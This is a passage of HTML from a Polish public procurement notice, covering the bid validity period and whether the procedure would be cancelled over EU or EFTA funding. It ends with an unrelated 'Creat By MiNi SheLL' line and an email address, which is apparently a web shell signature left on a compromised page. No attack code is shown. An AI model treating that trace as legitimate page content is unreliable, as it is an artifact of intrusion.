pokój Nr 19 /II piętro/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com